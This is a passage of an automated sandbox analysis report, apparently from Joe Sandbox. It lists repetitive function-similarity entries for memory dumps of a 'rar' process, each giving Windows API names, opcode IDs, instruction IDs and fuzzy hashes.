                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystem
                                                        • String ID:
                                                        • API String ID: 1175261203-0
                                                        • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                        • Instruction ID: 415922f739fc4a2228365a727df70732499b1426d1f1e08f9a6cde88aa6e755b
                                                        • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                        • Instruction Fuzzy Hash: D1F06829B1858181F770AB10E8553F5A364BF48784FC00032E9EE866D5EE2CD646CAA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: Process$AffinityCurrentMask
                                                        • String ID:
                                                        • API String ID: 1231390398-0
                                                        • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                        • Instruction ID: f2af3f6547f7edd9b7fd3a0f9c2831fd279b237667af32e0013f6c417ab5b5ed
                                                        • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                        • Instruction Fuzzy Hash: 20E02B24B3446142DBD9A719C491FA96390AF44B80FC02036F45BC3E94ED1CC5458B50
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                        • String ID:
                                                        • API String ID: 588628887-0
                                                        • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                        • Instruction ID: f3ecde02631478d68797f5bd82e7ff010efef4119244972a00f4200036951834
                                                        • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                        • Instruction Fuzzy Hash: 56E08668E1910342FF14B7F25804174A3D05F49B50FC54831E93F462D1FE2C644782F5
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: daa82b36dbe08442567d9e9e6d3a49adf35afbc1da2aff98a3382eab0ee38ee5
                                                        • Instruction ID: 98c502ae51fc9ed34b4d21b507f085b9c69cbe6d45699a1f531492c8d0f18748
                                                        • Opcode Fuzzy Hash: daa82b36dbe08442567d9e9e6d3a49adf35afbc1da2aff98a3382eab0ee38ee5
                                                        • Instruction Fuzzy Hash: D9E1186DA0C68241FB20BA2494456BEA751FF49B88F844137DE6F0B7C6DE2C9467C7B0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f795e070b02462b6cc60b4888632c25cffd8ce3c4bb1275aca493404e97c2d
                                                        • Instruction ID: 3cf718a0fe1ca6f21685b95c6f3d0e86dde088cd78bc5fd32b2655f49813dfd0
                                                        • Opcode Fuzzy Hash: d8f795e070b02462b6cc60b4888632c25cffd8ce3c4bb1275aca493404e97c2d
                                                        • Instruction Fuzzy Hash: EE512573518BD195E700AF64E8441ED77A8F744F88F98423ADA990B7DADF385062C371
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                        • String ID:
                                                        • API String ID: 3947729631-0
                                                        • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                        • Instruction ID: 40fb004504cbe5760d76e2d6b985d97bf7ca0dd659a06d32df3a144c0d4b30d8
                                                        • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                        • Instruction Fuzzy Hash: 0641C329A09A4382FB68BF159850278A395AF80750FD24837D93F07AD1DE3DE847C7E1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CommandLine
                                                        • String ID:
                                                        • API String ID: 3253501508-0
                                                        • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                        • Instruction ID: ba1bfb4a748164379efe68560868a68b8549913b911f9138f0b1d111831f73a3
                                                        • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                        • Instruction Fuzzy Hash: C701611B60D64285EB94B616A4501BE97B0AF86B94F880432EE6E073E9DE3DD547C3A0
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                        • Instruction ID: 806cd4ac6953f9612a7956e93398bb09b99968a62993c15ac99c2a5d0f7817ff
                                                        • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                        • Instruction Fuzzy Hash: E5017549A0C54340FB54B6A65A40275D3905F86BE0FC68A32FD7F462D6FD1CE44B41B2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CompareString
                                                        • String ID:
                                                        • API String ID: 1825529933-0
                                                        • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                        • Instruction ID: 21db4c2c8a365ce8e83a18ad438970cf8d713e21eed5bb3512d73175ce95dad0
                                                        • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                        • Instruction Fuzzy Hash: 0801846570C65245EB107B06B80506AE710AB59FC0F9C4836EF9E4BB9ACE3CD0438754
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: CloseFind
                                                        • String ID:
                                                        • API String ID: 1863332320-0
                                                        • Opcode ID: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                        • Instruction ID: db76878c2ed0dd220bcf4f201fe973373636aa94bff80d07975cce12fd34d5e6
                                                        • Opcode Fuzzy Hash: 86a096c0879f1b9d169584fab09b4cfda0d24ba67280b30728083c95e77eed4d
                                                        • Instruction Fuzzy Hash: 64F0F9259082C145EF00AB7450012F8A710AF07BB8F584336DE7E0B3C7CE6C908A8770
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                        • Instruction ID: d985e1cc6243cd431f27a0d687dea6e2cfa082eb4cbb18114a2a2e967224f54b
                                                        • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                        • Instruction Fuzzy Hash: 3EF0FE19A4D24341FB647AB2584127593805F4A7B0FCA1E36FD3F462C1EE6CE84B81B6
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                        • Instruction ID: e3efa0597dd7bc71eb083618e1b8003577c311d822105988df14a01d4b503168
                                                        • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                        • Instruction Fuzzy Hash: DDF0AF26A0874245FB24AB68F4403B8A771DB00BB8FD85332D63E050D8DE7CD893C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                        • Instruction ID: 2bcf1e9cb47672712fd152c32f62b443a2313f6ed2376f08ee62f4aadd237a18
                                                        • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                        • Instruction Fuzzy Hash: D4E04F58F1930240EF59366E18520798B415F66B81FD4563ECC3F4A3C2EC1EA05F57A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                        • Instruction ID: d8b45e4d763a80fb9ec3d96639c00110663cf2071ccc25ebfbf372e67b24fe95
                                                        • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                        • Instruction Fuzzy Hash: FCD0176DE1AD0292F704AB40BC4433092A1AF143B9FC10634C83D495D0CFAC3047C2A6
                                                        APIs
                                                        • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF7F7EC7A8C), ref: 00007FF7F7EA4549
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true
                                                        • Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                        • Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
